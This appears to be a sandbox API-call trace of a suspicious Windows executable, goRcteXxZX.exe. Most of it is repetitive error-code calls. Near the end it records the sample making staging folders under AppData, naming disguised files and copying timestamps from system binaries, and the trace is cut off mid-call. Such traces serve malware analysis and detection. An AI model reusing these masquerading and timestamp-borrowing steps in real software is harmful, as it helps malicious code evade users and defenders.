¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2ef7b4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ4\x01\x7fôìú.", lpUsedDefaultChar=0x0) returned 256 [0032.965] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.965] GetLastError () returned 0x0 [0032.965] SetLastError (dwErrCode=0x0) [0032.965] GetLastError () returned 0x0 [0032.965] SetLastError (dwErrCode=0x0) [0032.965] GetLastError () returned 0x0 [0032.965] SetLastError (dwErrCode=0x0) [0032.965] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.966] SetLastError (dwErrCode=0x0) [0032.966] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.967] SetLastError (dwErrCode=0x0) [0032.967] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.968] SetLastError (dwErrCode=0x0) [0032.968] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.969] SetLastError (dwErrCode=0x0) [0032.969] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.970] SetLastError (dwErrCode=0x0) [0032.970] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.971] SetLastError (dwErrCode=0x0) [0032.971] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.972] GetLastError () returned 0x0 [0032.972] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.973] GetLastError () returned 0x0 [0032.973] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.974] SetLastError (dwErrCode=0x0) [0032.974] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.975] SetLastError (dwErrCode=0x0) [0032.975] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.976] SetLastError (dwErrCode=0x0) [0032.976] GetLastError () returned 0x0 [0032.977] SetLastError (dwErrCode=0x0) [0032.977] GetLastError () returned 0x0 [0032.977] SetLastError (dwErrCode=0x0) [0032.977] GetLastError () returned 0x0 [0032.977] SetLastError (dwErrCode=0x0) [0032.977] GetLastError () returned 0x0 [0032.977] SetLastError (dwErrCode=0x0) [0032.977] GetLastError () returned 0x0 [0032.977] SetLastError (dwErrCode=0x0) [0032.977] GetLastError () returned 0x0 [0032.977] SetLastError (dwErrCode=0x0) [0032.977] GetLastError () returned 0x0 [0032.977] SetLastError (dwErrCode=0x0) [0032.977] GetLastError () returned 0x0 [0032.977] SetLastError (dwErrCode=0x0) [0032.977] GetLastError () returned 0x0 [0032.977] SetLastError (dwErrCode=0x0) [0032.977] GetLastError () returned 0x0 [0032.977] SetLastError (dwErrCode=0x0) [0032.977] GetLastError () returned 0x0 [0032.977] SetLastError (dwErrCode=0x0) [0032.977] GetLastError () returned 0x0 [0032.985] SetLastError (dwErrCode=0x0) [0032.985] GetLastError () returned 0x0 [0032.985] SetLastError (dwErrCode=0x0) [0032.985] GetLastError () returned 0x0 [0032.985] SetLastError (dwErrCode=0x0) [0032.985] GetLastError () returned 0x0 [0032.985] SetLastError (dwErrCode=0x0) [0032.985] GetLastError () returned 0x0 [0032.985] SetLastError (dwErrCode=0x0) [0032.985] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.986] GetLastError () returned 0x0 [0032.986] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.987] SetLastError (dwErrCode=0x0) [0032.987] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.988] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.988] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.988] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.988] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.988] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.988] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.988] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.988] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.988] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.988] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.988] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.988] GetLastError () returned 0x0 [0032.988] SetLastError (dwErrCode=0x0) [0032.989] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.989] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.989] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.990] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efb30 | out: lpSystemTimeAsFileTime=0x2efb30*(dwLowDateTime=0xe16228b0, dwHighDateTime=0x1d3dfba)) [0032.990] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2efa68, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.990] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ef950, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.990] GetLastError () returned 0x0 [0032.991] GetLastError () returned 0x0 [0032.991] GetLastError () returned 0x0 [0032.991] GetLastError () returned 0x0 [0032.991] GetLastError () returned 0x0 [0032.991] GetLastError () returned 0x0 [0032.991] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.991] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.991] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.991] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.991] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.991] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.991] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.991] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.991] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.991] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.991] GetLastError () returned 0xb7 [0032.991] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.991] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.991] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.991] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.991] wsprintfA (in: param_1=0x2ef7d0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.992] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.992] wsprintfA (in: param_1=0x2ef6cc, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.992] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.992] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.992] CloseHandle (hObject=0x74) returned 1 [0032.992] GetLastError () returned 0x0 [0032.992] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.992] GetLastError () returned 0x0 [0032.992] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.992] GetSystemDirectoryA (in: lpBuffer=0x2ef7d0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.992] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.992] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.992] CloseHandle (hObject=0x74) returned 1 [0032.992] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.992] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.993] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.994] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.994] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.994] LoadLibraryA 